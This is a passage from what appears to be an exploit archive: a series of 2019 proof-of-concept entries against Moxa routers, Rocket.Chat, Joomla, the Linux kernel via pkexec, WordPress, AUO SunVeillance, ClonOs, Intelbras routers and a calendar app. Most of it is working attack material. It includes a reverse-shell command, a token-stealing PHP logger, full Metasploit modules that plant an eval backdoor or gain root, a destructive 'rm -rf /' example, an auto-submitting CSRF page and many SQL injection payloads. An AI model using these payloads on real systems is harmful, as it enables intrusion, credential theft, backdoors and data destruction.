7.2 has been calculated. CVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user had to export the log files previously. A CVSS v3 base score of 4.3 has been calculated. Exploitation CVE-2019-10969 - Ping Command Injection The Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below: Ping command injection Due to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below: bash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1 CVE-2019-10963 - Missing Access Control On Log Files When a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow: http://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz An attacker can retrieve this archive without being authenticated on the Web interface as shown below: # wget http://192.168.0.1/MOXA_All_LOG.tar.gz --2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz Connexion à 192.168.0.1:80... connecté. requête HTTP transmise, en attente de la réponse... 200 OK Taille : 15724 (15K) [text/plain] Sauvegarde en : " MOXA_All_LOG.tar.gz " MOXA_All_LOG.tar.gz 100%[====================================================================================================================================>] 15,36K --.-KB/s ds 0s 2019-02-13 17:35:19 (152 MB/s) - " MOXA_All_LOG.tar.gz " sauvegardé [15724/15724] # tar ztvf MOXA_All_LOG.tar.gz drwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/ -rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini -rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini -rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini Mitigation It is recommended to install at least the firmware version 5.3 from Moxa website. Timeline 2019-02-24: Vendor Disclosure 2019-02-24: Advisory sent to ICS-CERT 2019-09-30: Advisory published by Moxa 2019-10-01: Advisory published by ICS-CERT

# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting # Author: 3H34N # Date: 2019-10-22 # Product: Rocket.Chat # Vendor: https://rocket.chat/ # Vulnerable Version(s): Rocket.Chat < 2.1.0 # CVE: CVE-2019-17220 # Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp) # PoC # 1. Create l33t.php on a web server <?php $output = fopen("logs.txt", "a+") or die("WTF? o.O"); $leet = $_GET['leet']."\n\n"; fwrite($output, $leet); fclose($output); ?> # 2. Open a chat session # 3. Send payload with your web server url  # 4. Token will be written in logs.txt when target seen your message.

# Title: IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path # Author: Sainadh Jamalpur # Date: 2019-10-22 # Vendor Homepage: https://www.iobit.com # Software Link: https://www.iobit.com/en/advanceduninstaller.php # Version : 9.1.0.8 # Tested on: Windows 10 64bit(EN) # CVE : N/A # 1. Description: # Unquoted service paths in IObit Uninstaller v9.1.0.8 have an unquoted service path. # PoC =========== C:\>sc qc IObitUnSvr [SC] QueryServiceConfig SUCCESS SERVICE_NAME: IObitUnSvr TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : IObit Uninstaller Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\> #Exploit: ============ A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. # Disclaimer ============= The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.

# Exploit Title: Joomla! 3.4.6 - Remote Code Execution (Metasploit) # Google Dork: N/A # Date: 2019-10-02 # Exploit Author: Alessandro Groppo # Vendor Homepage: https//www.joomla.it/ # Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6 # Version: 3.0.0 --> 3.4.6 # Tested on: Linux # CVE : N/A ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Joomla def initialize(info = {}) super(update_info(info, 'Name' => 'Rusty Joomla Unauthenticated Remote Code Execution', 'Description' => %q{ PHP Object Injection because of a downsize in the read/write process with the database leads to RCE. The exploit will backdoor the configuration.php file in the root directory with en eval of a POST parameter. That's because the exploit is more reliabale (doesn't rely on common disabled function). For this reason, use it with caution and remember the house cleaning. Btw, you can also edit this exploit and use whatever payload you want. just modify the exploit object with get_payload('you_php_function','your_parameters'), e.g. get_payload('system','rm -rf /') and enjoy }, 'Author' => [ 'Alessandro \'kiks\' Groppo @Hacktive Security', ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41'], ['URL', 'https://github.com/kiks7/rusty_joomla_rce'] ], 'Privileged' => false, 'Platform' => 'PHP', 'Arch' => ARCH_PHP, 'Targets' => [['Joomla 3.0.0 - 3.4.6', {}]], 'DisclosureDate' => 'Oct 02 2019', 'DefaultTarget' => 0) ) register_advanced_options( [ OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]), ]) end def get_random_string(length=50) source=("a".."z").to_a + ("A".."Z").to_a + (0..9).to_a key="" length.times{ key += source[rand(source.size)].to_s } return key end def get_session_token # Get session token from cookies vprint_status('Getting Session Token') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) cook = res.headers['Set-Cookie'].split(';')[0] vprint_status('Session cookie: ' + cook) return cook end def get_csrf_token(sess_cookie) vprint_status('Getting CSRF Token') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'/index.php/component/users'), 'headers' => { 'Cookie' => sess_cookie, } }) html = res.get_html_document input_field = html.at('//form').xpath('//input')[-1] token = input_field.to_s.split(' ')[2] token = token.gsub('name="','').gsub('"','') if token then vprint_status('CSRF Token: ' + token) return token end print_error('Cannot get the CSRF Token ..') end def get_payload(function, payload) # @function: The PHP Function # @payload: The payload for the call template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' # The http:// part is necessary in order to validate a condition in SimplePie::init and trigger the call_user_func with arbitrary values payload = 'http://l4m3rz.l337/;' + payload final = template.gsub('PAYLOAD',payload).gsub('LENGTH', payload.length.to_s).gsub('FUNC_NAME', function).gsub('FUNC_LEN', function.length.to_s) return final end def get_payload_backdoor(param_name) # return the backdoor payload # or better, the payload that will inject and eval function in configuration.php (in the root) # As said in other part of the code. we cannot create new .php file because we cannot use # the ? character because of the check on URI schema function = 'assert' template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}' # This payload will append an eval() at the end of the configuration file payload = "file_put_contents('configuration.php','if(isset($_POST[\\'"+param_name+"\\'])) eval($_POST[\\'"+param_name+"\\']);', FILE_APPEND) || $a=\'http://wtf\';" template['PAYLOAD'] = payload template['LENGTH'] = payload.length.to_s template['FUNC_NAME'] = function template['FUNC_LEN'] = function.length.to_s return template end def check_by_exploiting # Check that is vulnerable by exploiting it and try to inject a printr('something') # Get the Session anb CidSRF Tokens sess_token = get_session_token() csrf_token = get_csrf_token(sess_token) print_status('Testing with a POC object payload') username_payload = '\\0\\0\\0' * 9 password_payload = 'AAA";' # close the prev object password_payload += get_payload('print_r','IAMSODAMNVULNERABLE') # actual payload password_payload += 's:6:"return":s:102:' # close cleanly the object res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/index.php/component/users'), 'method' => 'POST', 'headers' => { 'Cookie' => sess_token, }, 'vars_post' => { 'username' => username_payload, 'password' => password_payload, 'option' => 'com_users', 'task' => 'user.login', csrf_token => '1', } }) # Redirect in order to retrieve the output if res.redirection then res_redirect = send_request_cgi({ 'method' => 'GET', 'uri' => res.redirection.to_s, 'headers' =>{ 'Cookie' => sess_token } }) if 'IAMSODAMNVULNERABLE'.in? res.to_s or 'IAMSODAMNVULNERABLE'.in? res_redirect.to_s then return true else return false end end end def check # Check if the target is UP and get the current version running by info leak res = send_request_cgi({'uri' => normalize_uri(target_uri.path, '/administrator/manifests/files/joomla.xml')}) unless res print_error("Connection timed out") return Exploit::CheckCode::Unknown end # Parse XML to get the version if res.code == 200 then xml = res.get_xml_document version = xml.at('version').text print_status('Identified version ' + version) if version <= '3.4.6' and version >= '3.0.0' then if check_by_exploiting() return Exploit::CheckCode::Vulnerable else if check_by_exploiting() then # Try the POC 2 times. return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end else return Exploit::CheckCode::Safe end else print_error('Cannot retrieve XML file for the Joomla Version. Try the POC in order to confirm if it\'s vulnerable') if check_by_exploiting() then return Exploit::CheckCode::Vulnerable else if check_by_exploiting() then return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Safe end end end end def exploit if check == Exploit::CheckCode::Safe && !datastore['FORCE'] print_error('Target is not vulnerable') return end pwned = false cmd_param_name = get_random_string(50) sess_token = get_session_token() csrf_token = get_csrf_token(sess_token) # In order to avoid problems with disabled functions # We are gonna append an eval() function at the end of the configuration.php file # This will not cause any problem to Joomla and is a good way to execute then PHP directly # cuz assert is toot annoying and with conditions that we have we cannot inject some characters # So we will use 'assert' with file_put_contents to append the string. then create a reverse shell with this backdoor # Oh i forgot, We cannot create a new file because we cannot use the '?' character in order to be interpreted by the web server. # TODO: Add the PHP payload object to inject the backdoor inside the configuration.php file # Use the implanted backdoor to receive a nice little reverse shell with a PHP payload # Implant the backdoor vprint_status('Cooking the exploit ..') username_payload = '\\0\\0\\0' * 9 password_payload = 'AAA";' # close the prev object password_payload += get_payload_backdoor(cmd_param_name) # actual payload password_payload += 's:6:"return":s:102:' # close cleanly the object print_status('Sending exploit ..') res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/index.php/component/users'), 'method' => 'POST', 'headers' => { 'Cookie' => sess_token }, 'vars_post' => { 'username' => username_payload, 'password' => password_payload, 'option' => 'com_users', 'task' => 'user.login', csrf_token => '1' } }) print_status('Triggering the exploit ..') if res.redirection then res_redirect = send_request_cgi({ 'method' => 'GET', 'uri' => res.redirection.to_s, 'headers' =>{ 'Cookie' => sess_token } }) end # Ping the backdoor see if everything is ok :/ res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'configuration.php'), 'vars_post' => { cmd_param_name => 'echo \'PWNED\';' } }) if res.to_s.include? 'PWNED' then print_status('Target P0WN3D! eval your code at /configuration.php with ' + cmd_param_name + ' in a POST') print_status('Now it\'s time to reverse shell') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path,'configuration.php'), 'vars_post' => { cmd_param_name => payload.encoded } }) end end end

# Exploit Title: Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection # Date: 2019-10-22 # Exploit Author: Lucian Ioan Nitescu # Contact: https://twitter.com/LucianNitescu # Webiste: https://nitesculucian.github.io # Vendor Homepage: https://slicedinvoices.com/ # Software Link: https://wordpress.org/plugins/sliced-invoices/ # Version: 3.8.2 # Tested on: Ubuntu 18.04 / Wordpress 5.3 # 1. Description: # Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected # by an Authenticated SQL Injection vulnerability. # 2. Proof of Concept: # Authenticated SQL Injection: - Using an Wordpress user, access <your target> /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20 - The response will be returned after 20 seconds proving the successful exploitation of the vulnerability. - Sqlmap can be used to further exploit the vulnerability.

# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control # Date: 2019-10-24 # Exploit Author: Luca.Chiou # Vendor Homepage: https://www.auo.com/zh-TW # Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e # Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index # CVE: N/A # 1. Description: # An issue was discovered in AUO SunVeillance Monitoring System. # There is an incorrect access control vulnerability that can allow the attacker to # bypass the authentication mechanism, and upload files to the server without any authentication. # 2. Proof of Concept: (1) Access the picture management page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/Picture_Manage_mvc.aspx) without any authentication. As a guest role, user is not allowed to upload a picture. However, there are two parameters, Act and authority, in Picture_Manage_mvc.aspx. (2) Modify the value of parameter authority from 40 to 100. You can find out the upload button is enabled. (3) Now you can upload a file successfully. (4) The file which we uploaded is storing in server side. It’s means any user without authentication can upload files to server side. Thank you for your kind assistance. Luca

# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection # Date: 2019-10-24 # Exploit Author: Luca.Chiou # Vendor Homepage: https://www.auo.com/zh-TW # Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e # Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index # CVE: N/A # 1. Description: # AUO SunVeillance Monitoring System all versions prior to v1.1.9e that is vulnerable to SQL Injection. # The vulnerability can allow the attacker inject maliciously SQL command to the server which allows # the attacker to read privileged data. # 2. Proof of Concept: (1) Access the sending mail page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/mvc_send_mail.aspx) without any authentication. There is a parameter, MailAdd, in mvc_send_mail.aspx. (2) Modify the value of parameter MailAdd with single quotation. The error messages contains oracle database information. (3) By using sqlmap tools, attacker can acquire the database list which in server side. cmd: sqlmap.py -u “https://<host>/Solar_Web_Portal/mvc_send_mail.aspx?MailAdd=” -p MailAdd –dbs (4) Furthermore, there are a few SQL Injection vulnerabilities in other fields. picture_manage_mvc.aspx (parameter: plant_no) swapdl_mvc.aspx (parameter: plant_no) account_management.aspx (parameter: Text_Postal_Code, Text_Dis_Code) Thank you for your kind assistance. Luca

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::Kernel include Msf::Post::Linux::System include Msf::Post::Linux::Compile include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit', 'Description' => %q{ This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but not over an SSH session, as it requires execution from within the context of a user with an active Polkit agent. In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit's pkexec helper with PTRACE_TRACEME. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jann Horn', # Discovery and exploit 'bcoles', # Metasploit module 'timwr', # Metasploit module ], 'References' => [ ['CVE', '2019-13272'], ['EDB', '47133'], ['PACKETSTORM', '153663'], ['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272'], ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1903'], ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X64 ], 'Targets' => [[ 'Auto', {} ]], 'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp', 'PrependFork' => true, }, 'DisclosureDate' => 'Jul 4 2019')) register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end def check # Introduced in 4.10, but also backported # Patched in 4.4.185, 4.9.185, 4.14.133, 4.19.58, 5.1.17 release = kernel_release v = Gem::Version.new release.split('-').first if v >= Gem::Version.new('5.1.17') || v < Gem::Version.new('3') vprint_error "Kernel version #{release} is not vulnerable" return CheckCode::Safe end vprint_good "Kernel version #{release} appears to be vulnerable" unless command_exists? 'pkexec' vprint_error 'pkexec is not installed' return CheckCode::Safe end vprint_good 'pkexec is installed' arch = kernel_hardware unless arch.include? 'x86_64' vprint_error "System architecture #{arch} is not supported" return CheckCode::Safe end vprint_good "System architecture #{arch} is supported" loginctl_output = cmd_exec('loginctl --no-ask-password show-session "$XDG_SESSION_ID" | grep Remote') if loginctl_output =~ /Remote=yes/ print_warning 'This is exploit requires a valid policykit session (it cannot be executed over ssh)' return CheckCode::Safe end CheckCode::Appears end def exploit if is_root? && !datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end unless check == CheckCode::Appears unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end unless writable? datastore['WritableDir'] fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" end payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}" upload_and_chmodx(payload_file, generate_payload_exe) register_file_for_cleanup(payload_file) exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}" if live_compile? vprint_status 'Live compiling exploit on system...' upload_and_compile exploit_file, exploit_data('CVE-2019-13272', 'poc.c') else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx exploit_file, exploit_data('CVE-2019-13272', 'exploit') end register_file_for_cleanup(exploit_file) print_status("Executing exploit '#{exploit_file}'") result = cmd_exec("echo #{payload_file} | #{exploit_file}") print_status("Exploit result:\n#{result}") end end

# Exploit Title: ClonOs WEB UI 19.09 - Improper Access Control # Date: 2019-10-19 # Exploit Author: İbrahim Hakan Şeker # Vendor Homepage: https://clonos.tekroutine.com/ # Software Link: https://github.com/clonos/control-pane # Version: 19.09 # Tested on: ClonOs # CVE : 2019-18418 import requests from bs4 import BeautifulSoup import sys def getUser(host): reg=r'\"' r1 = requests.post(host+"/json.php",data={"mode":"getJsonPage","path":"/users/","hash":"","db_path":""},headers={"X-Requested-With":"XMLHttpRequest"}) r1_source = BeautifulSoup(r1.content,"lxml") for k in r1_source.findAll("tr"): for i in k.findAll("td")[0]: print(f"[+]User Found: {i} User id: {k.get('id').replace(reg,'')}") def changePassword(host,user,password,id): data={ "mode":"usersEdit", "path":"/users/", "hash":"", "db_path":"", "form_data[username]":f"{user}", "form_data[password]":f"{password}", "form_data[password1]":f"{password}", "form_data[first_name]":"", "form_data[last_name]":"", "form_data[actuser]":"on", "form_data[user_id]": int(id) } r2=requests.post(host,data=data,headers={"X-Requested-With":"XMLHttpRequest"}) if r2.status_code==200:print("[+]OK") else:print("[-]Fail") if __name__=="__main__": if len(sys.argv)>1: if "getUser" in sys.argv[1]:getUser(sys.argv[2]) elif "changePassword" in sys.argv[1]:changePassword(sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5]) else:print("Fail parameter") else:print("Usage: exploit.py getUser [http://ip_adres]\nexploit.py changePassword [http://ip_adres] [username] [new_password] [user_id]")

Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery Date: 2019-10-25 Exploit Author: Prof. Joas Antonio Vendor Homepage: https://www.intelbras.com/pt-br/ Software Link: http://en.intelbras.com.br/node/25896 Version: 1.0.18 Tested on: Windows CVE : N/A #################### # PoC1: https://www.youtube.com/watch?v=V188HHDMbGM&feature=youtu.be <html> <body> <form action="http://10.0.0.1/goform/SysToolChangePwd" method="POST"> <input type="hidden" name="GO" value="system_password.asp"> <input type="hidden" name="SYSPSC" value="0"> <input class="text" type="password" name="SYSOPS" value="hack123"/> <input class="text" type="password" name="SYSPS" value="mrrobot"/> <input class="text" type="password" name="SYSPS2" value="mrrobot"/> </form> <script> document.forms[0].submit(); </script> </body> </html>

Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'start' SQL Injection Date: 2019-10-28 Exploit Author: Cakes Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git Version: 1.21 Tested on: CentOS7 CVE : N/A # PoC: Multiple SQL Injection vulnerabilities Parameter: start (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' RLIKE (SELECT (CASE WHEN (3201=3201) THEN 0x323031392d30312d32332030303a30303a3030 ELSE 0x28 END)) AND 'ScZt'='ScZt&end=2019-01-24 00:00:00 Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6693 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6693=6693,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'oFHi'='oFHi&end=2019-01-24 00:00:00 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00' AND (SELECT 6752 FROM (SELECT(SLEEP(5)))ImfQ) AND 'EAnH'='EAnH&end=2019-01-24 00:00:00 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Parameter: end (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' RLIKE (SELECT (CASE WHEN (4825=4825) THEN 0x323031392d30312d32342030303a30303a3030 ELSE 0x28 END)) AND 'xqhi'='xqhi Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 4638 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(4638=4638,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OvvR'='OvvR Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=Test&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00' AND (SELECT 6750 FROM (SELECT(SLEEP(5)))gPYF) AND 'Xhni'='Xhni Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Parameter: title (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: title=Test'||(SELECT 0x68506d50 FROM DUAL WHERE 9657=9657 AND 5501=5501)||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: AND [INFERENCE] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: title=Test'||(SELECT 0x684f4b6d FROM DUAL WHERE 1515=1515 AND (SELECT 6271 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(6271=6271,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=Test'||(SELECT 0x72417477 FROM DUAL WHERE 3543=3543 AND (SELECT 4482 FROM (SELECT(SLEEP(5)))AnGw))||'&description=Test&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Parameter: description (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: title=Test&description=Test'||(SELECT 0x7570456a FROM DUAL WHERE 7753=7753 AND 5528=5528)||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: AND [INFERENCE] Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: title=Test&description=Test'||(SELECT 0x4f6d6f41 FROM DUAL WHERE 6915=6915 AND (SELECT 9677 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(9677=9677,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: title=Test&description=Test'||(SELECT 0x6a424e63 FROM DUAL WHERE 6961=6961 AND (SELECT 9467 FROM (SELECT(SLEEP(5)))jHfq))||'&color=#0071c5&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Parameter: color (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: title=Test&description=Test&color=#0071c5' RLIKE (SELECT (CASE WHEN (2320=2320) THEN 0x23303037316335 ELSE 0x28 END)) AND 'XfIW'='XfIW&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 2035 FROM(SELECT COUNT(*),CONCAT(0x71626b6a71,(SELECT (ELT(2035=2035,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'nWLO'='nWLO&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: title=Test&description=Test&color=#0071c5' OR (SELECT 7165 FROM (SELECT(SLEEP(5)))kngP) AND 'oklj'='oklj&start=2019-01-23 00:00:00&end=2019-01-24 00:00:00 Vector: OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

